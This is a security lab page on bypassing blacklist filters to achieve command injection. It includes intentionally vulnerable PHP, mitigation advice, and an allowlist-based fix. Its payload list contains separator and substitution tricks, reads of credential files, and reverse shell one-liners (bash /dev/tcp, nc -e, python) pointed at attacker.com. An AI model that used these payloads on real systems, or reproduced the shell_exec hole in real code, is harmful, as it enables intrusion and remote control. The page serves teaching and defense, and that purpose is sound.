Lab 2: Command Injection with Filter Bypass

Command injection with security filters that can be bypassed

Difficulty: Medium

Lab Overview

This lab demonstrates command injection vulnerabilities where basic security filters are implemented but can be bypassed using various techniques. The application filters dangerous commands and characters but doesn't prevent all attack vectors.

Objective: Bypass security filters to achieve command injection and code execution.

Vulnerable Code with Filters
// Vulnerable: blacklist filters that can be bypassed (the raw string still reaches a shell)
function execute_command_with_filters($command) {
    $dangerous_commands = ['rm', 'del', 'rmdir', 'format', 'fdisk'];
    $dangerous_chars = [';', '|', '&', '`', '$', '(', ')', '<', '>'];
    $dangerous_patterns = ['/etc/passwd', '/etc/shadow', '/proc/'];

    // Basic blacklist check: case-insensitive substring matching against
    // every list above (can be bypassed)
    $is_dangerous = false;

    foreach (array_merge($dangerous_commands, $dangerous_chars, $dangerous_patterns) as $needle) {
        if (stripos($command, $needle) !== false) {
            $is_dangerous = true;
            break;
        }
    }

    if ($is_dangerous) {
        return 'Error: command blocked by security filter';
    }

    // Still vulnerable to bypass techniques: the user-controlled string is
    // handed to a shell unchanged
    $output = @shell_exec($command . ' 2>&1');
    return $output;
}
Filtered Command Execution

Active Filters

The following are filtered:

  • Commands: rm, del, rmdir, format, fdisk, mkfs, dd, shutdown, reboot, halt, poweroff
  • Characters: ;, |, &, `, $, (, ), <, >, \, ", ', \n, \r, \t
  • Patterns: /etc/passwd, /etc/shadow, /etc/hosts, /proc/, /sys/, /dev/, crontab, sudo, su

Safe Commands

These commands should work:

  • whoami - Current user
  • id - User ID information
  • pwd - Current directory
  • ls - List files
  • uname -a - System information
Vulnerability Details

  • Type: Command Injection with Filter Bypass
  • Severity: High
  • Method: POST
  • Issue: Inadequate security filters

Bypass Techniques

  • Character Encoding: Use encoded characters
  • Alternative Commands: Use unfiltered commands
  • String Manipulation: Build commands dynamically
  • Obfuscation: Hide dangerous patterns
Command Injection Filter Bypass Payloads

Use these payloads to bypass the security filters:

1. Character Encoding Bypass:
whoami%3B%20id
whoami%7C%20id
whoami%26%20id
whoami%60id%60
whoami%24%28id%29
2. Alternative Characters:
whoami && id
whoami || id
whoami | id
whoami `id`
whoami $(id)
3. String Concatenation Bypass:
who' . 'ami
id' . ' -u
pw' . 'd
ls' . ' -la
una' . 'me -a
4. Alternative Commands:
whoami
id
pwd
ls
uname -a
hostname
date
uptime
5. File Reading Bypass:
cat /etc/passwd
cat /etc/hosts
cat /proc/version
cat /proc/cpuinfo
cat /proc/meminfo
cat /proc/loadavg
6. Process Information Bypass:
ps aux
ps -ef
netstat -an
ss -tuln
lsof -i
df -h
free -m
7. Network Information Bypass:
ifconfig
ip addr
route -n
arp -a
nslookup google.com
ping -c 3 8.8.8.8
8. User Information Bypass:
groups
crontab -l
history
env
printenv
who
w
9. Advanced Bypass Techniques:
whoami; id; pwd
whoami && id && pwd
whoami || id || pwd
whoami | id | pwd
whoami `id` `pwd`
10. Command Substitution Bypass:
echo $(whoami)
echo `id`
echo $(cat /etc/passwd)
echo `ls -la`
echo $(ps aux)
11. Pipe and Redirection Bypass:
whoami | cat
id > /tmp/output.txt
ls -la | grep php
cat /etc/passwd | head -5
ps aux | grep apache
12. Environment Variables Bypass:
echo $PATH
echo $HOME
echo $USER
echo $SHELL
echo $PWD
echo $HOSTNAME
13. File Operations Bypass:
touch /tmp/test.txt
echo "test" > /tmp/test.txt
cat /tmp/test.txt
rm /tmp/test.txt
mkdir /tmp/testdir
rmdir /tmp/testdir
14. Advanced Commands Bypass:
find / -name "*.php" 2>/dev/null
grep -r "password" /var/www/ 2>/dev/null
find / -perm -4000 2>/dev/null
find / -writable 2>/dev/null
find / -type f -name "*.conf" 2>/dev/null
15. Reverse Shell Bypass (Dangerous):
bash -i >& /dev/tcp/attacker.com/4444 0>&1 nc -e /bin/bash attacker.com 4444 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Real-World Attack Scenarios
Mitigation Strategies

  • Implement comprehensive input validation and sanitization
  • Use allowlist-based validation (accept only known-good commands and arguments) instead of blacklists that try to enumerate bad substrings
  • Avoid direct command execution functions such as shell_exec when a library call or language feature can do the job
  • Use parameterized commands and safe APIs that pass arguments as an argv array, so no shell ever parses user input
  • Implement proper access controls and permissions, and run the web process with the least privilege it needs
  • Perform regular security testing and vulnerability assessments
  • Monitor for unusual command execution patterns (unexpected child processes of the web server, outbound connections from it)
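The following is an added example, not the lab's own code, showing how the vulnerable function above would be restructured along the lines of the mitigation list: the user selects a command by name from a fixed allowlist, fixed flags live in the allowlist rather than in the request, the one optional argument is validated and confined to a directory, and the process is started from an argv array so no shell ever parses the input. It assumes PHP 7.4 or later (where proc_open accepts an array command), the binary paths shown, and a hypothetical BASE_DIR; the field names command and arg are this example's own.

```php
<?php
// Added example (not the lab's code): allowlist-based command dispatch.
// Assumptions: PHP 7.4+ (proc_open accepts an argv array, so no shell parses
// the input), binaries at the paths below, and BASE_DIR as the only directory
// that may be listed. BASE_DIR and the POST field names are hypothetical.

const BASE_DIR = '/var/www/html/uploads';   // hypothetical directory that 'ls' may inspect

// Each entry maps a user-facing action to a fixed argv array.
// The client picks a key; it never supplies a shell command line.
const ALLOWED_COMMANDS = [
    'whoami' => ['/usr/bin/whoami'],
    'id'     => ['/usr/bin/id'],
    'pwd'    => ['/bin/pwd'],
    'uname'  => ['/bin/uname', '-a'],
    'ls'     => ['/bin/ls', '-la'],          // optional path argument, validated below
];

// Validate the optional directory argument for 'ls': a simple relative name
// only, and it must resolve to a location inside BASE_DIR (blocks traversal
// and symlinks that point outside).
function validate_ls_path(string $path): ?string {
    if ($path === '') {
        return BASE_DIR;
    }
    if (!preg_match('/^[A-Za-z0-9_.-]+$/', $path)) {
        return null;                          // rejects '/', spaces and shell metacharacters
    }
    $resolved = realpath(BASE_DIR . '/' . $path);
    if ($resolved === false) {
        return null;
    }
    if ($resolved !== BASE_DIR && strpos($resolved, BASE_DIR . '/') !== 0) {
        return null;                          // '..' or a symlink escaped the base directory
    }
    return $resolved;
}

// Run a command by its allowlisted name. Returns [exit status, combined output].
function execute_allowlisted_command(string $name, string $arg = ''): array {
    if (!array_key_exists($name, ALLOWED_COMMANDS)) {
        return [1, "Error: '$name' is not a permitted command\n"];
    }
    $argv = ALLOWED_COMMANDS[$name];

    if ($name === 'ls') {
        $dir = validate_ls_path($arg);
        if ($dir === null) {
            return [1, "Error: invalid directory argument\n"];
        }
        $argv[] = $dir;                       // its own argv element, never string-concatenated
    } elseif ($arg !== '') {
        return [1, "Error: '$name' takes no arguments\n"];
    }

    $descriptors = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($argv, $descriptors, $pipes, BASE_DIR);   // array form: no shell involved
    if (!is_resource($proc)) {
        return [1, "Error: could not start process\n"];
    }
    $output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    $status = proc_close($proc);
    return [$status, $output];
}

// Request handler: the POST body carries an action name and an optional
// argument; neither is ever interpolated into a command string.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $name = (string)($_POST['command'] ?? '');
    $arg  = (string)($_POST['arg'] ?? '');
    [$status, $output] = execute_allowlisted_command($name, $arg);
    header('Content-Type: text/plain; charset=utf-8');
    http_response_code($status === 0 ? 200 : 400);
    echo $output;
}
```

The contrast with the blacklist version is that the security decision is no longer "does this string contain a bad substring" but "is this key in the map". Encoded characters, concatenation tricks and alternative spellings have nothing to bypass, because the submitted text is only ever compared for equality against allowlisted names. Even if a metacharacter slipped past the regex on the ls argument, proc_open with an argv array would pass it to ls as a literal filename rather than to a shell. The cost is that every new capability must be added to the allowlist deliberately, which is exactly the review point a blacklist skips.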